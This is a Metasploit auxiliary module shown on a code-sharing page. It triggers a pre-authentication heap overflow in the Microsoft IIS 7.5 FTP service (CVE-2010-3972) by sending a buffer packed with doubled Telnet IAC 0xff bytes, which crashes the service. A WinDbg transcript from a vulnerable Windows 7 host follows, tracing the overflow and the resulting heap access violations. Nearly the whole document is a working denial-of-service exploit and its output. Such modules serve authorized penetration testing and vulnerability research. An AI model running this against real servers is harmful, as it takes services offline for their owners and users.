Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb
21367 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Microsoft IIS FTP Server Encoded Response Overflow Trigger',

15
        'Description' => %q{

16
          This module triggers a heap overflow when processing a specially crafted

17
          FTP request containing Telnet IAC (0xff) bytes. When constructing the response,

18
          the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.

19


20
          This issue can be triggered pre-auth and may in fact be exploitable for

21
          remote code execution.

22
        },

23
        'Author' => [

24
          'Matthew Bergin', # Original discovery/disclosure

25
          'jduck' # Metasploit module

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          [ 'CVE', '2010-3972' ],

30
          [ 'OSVDB', '70167' ],

31
          [ 'BID', '45542' ],

32
          [ 'MSB', 'MS11-004' ],

33
          [ 'EDB', '15803' ],

34
          [ 'URL', 'https://msrc-blog.microsoft.com/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability/' ]

35
        ],

36
        'DisclosureDate' => '2010-12-21',

37
        'Notes' => {

38
          'Stability' => [CRASH_SERVICE_DOWN],

39
          'SideEffects' => [],

40
          'Reliability' => []

41
        }

42
      )

43
    )

44


45
    register_options(

46
      [

47
        Opt::RPORT(21)

48
      ]

49
    )

50
  end

51


52
  def run

53
    connect

54


55
    banner = sock.get_once(-1, 10)

56
    print_status("banner: #{banner.to_s.strip}")

57


58
    buf = Rex::Text.pattern_create(1024)

59


60
    # the 0xff's must be doubled, the server will un-and-re-double them.

61
    ffs = "\xff" * (0x7e * 2)

62


63
    # Continuing after the first exception sometimes leads to this being dereferenced.

64
    buf[0, 3] = [0xdeadbe00].pack('V')[1, 3]

65


66
    buf[4, ffs.length] = ffs

67
    buf << "\r\n"

68


69
    sock.put(buf)

70


71
    disconnect

72
  rescue ::Rex::ConnectionError => e

73
    vprint_error(e.message)

74
  end

75
end

76


77
=begin

78


79
This transcript is from a vulnerable Win7 machine:

80


81
Processing initial command '$<script.wdbg'

82
0:012> $<script.wdbg

83
0:012> bp ftpsvc+3f360 ".printf \"buf @ 0x%x, len: 0x%x (end: 0x%x)\\n\", eax, ecx, (eax+ecx);g"

84
0:012> bp ftpsvc+3f382 ".printf \"extra len: 0x%x\\n\", edi;g"

85
0:012> bp ftpsvc+3f395 ".printf \"(0x%x+0x%x) 0x%x > (0x%x-0x%x) 0x%x ??\\n\", ecx, edi, ebx, poi(esi+14), poi(esi+8), edx;g"

86
0:012> bp ftpsvc+3f397

87
0:012> bp ftpsvc+3f39f "r @$t0 = ecx;g"

88
0:012> bp ftpsvc+3f3a4 ".printf \"allocated 0x%x bytes at 0x%x (end: 0x%x)\\n\", @$t0, eax, (eax+@$t0);g"

89
0:012> *bp ftpsvc+3f3c0 ".printf \"writing 0xff to 0x%x\\n\", eax;g"

90
0:012> *bp ftpsvc+3f3c6 ".printf \"writing 0x%x to 0x%x\\n\", (edx & 0xff), eax;g"

91
0:012> g

92
buf @ 0x97f81c, len: 0x1b (end: 0x97f837)

93
extra len: 0x0

94
buf @ 0x3e4ca0, len: 0x3a4 (end: 0x3e5044)

95
extra len: 0x7e

96
(0x3a4+0x7e) 0x422 > (0x422-0x0) 0x422 ??

97
Breakpoint 3 hit

98
eax=003e4ca0 ebx=00000422 ecx=000003a4 edx=00000422 esi=00dcfaf8 edi=0000007e

99
eip=6c63f397 esp=00dcfaac ebp=00dcfac0 iopl=0         nv up ei pl zr na pe nc

100
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246

101
ftpsvc!TELNET_STREAM_CONTEXT::OnSendData+0x49:

102
6c63f397 8b7df8          mov     edi,dword ptr [ebp-8] ss:0023:00dcfab8=00000000

103
0:007> g

104
(2f8.a40): Access violation - code c0000005 (first chance)

105
First chance exceptions are reported before any exception handling.

106
This exception may be expected and handled.

107
eax=003e50d0 ebx=00000000 ecx=ffffffff edx=003e4898 esi=003e4890 edi=002f0000

108
eip=778f30d7 esp=00dcf990 ebp=00dcfa70 iopl=0         nv up ei ng nz ac pe cy

109
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297

110
ntdll!RtlpFreeHeap+0x4d6:

111
778f30d7 8b19            mov     ebx,dword ptr [ecx]  ds:0023:ffffffff=????????

112
0:007> g

113
(2f8.a40): Access violation - code c0000005 (first chance)

114
First chance exceptions are reported before any exception handling.

115
This exception may be expected and handled.

116
eax=003e4898 ebx=003e4c98 ecx=deadbe27 edx=ffffff41 esi=003e4890 edi=002f0000

117
eip=778f6030 esp=00dcf950 ebp=00dcf978 iopl=0         nv up ei pl zr na pe nc

118
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

119
ntdll!RtlpCoalesceFreeBlocks+0x268:

120
778f6030 8b4904          mov     ecx,dword ptr [ecx+4] ds:0023:deadbe2b=????????

121


122
=end

123


124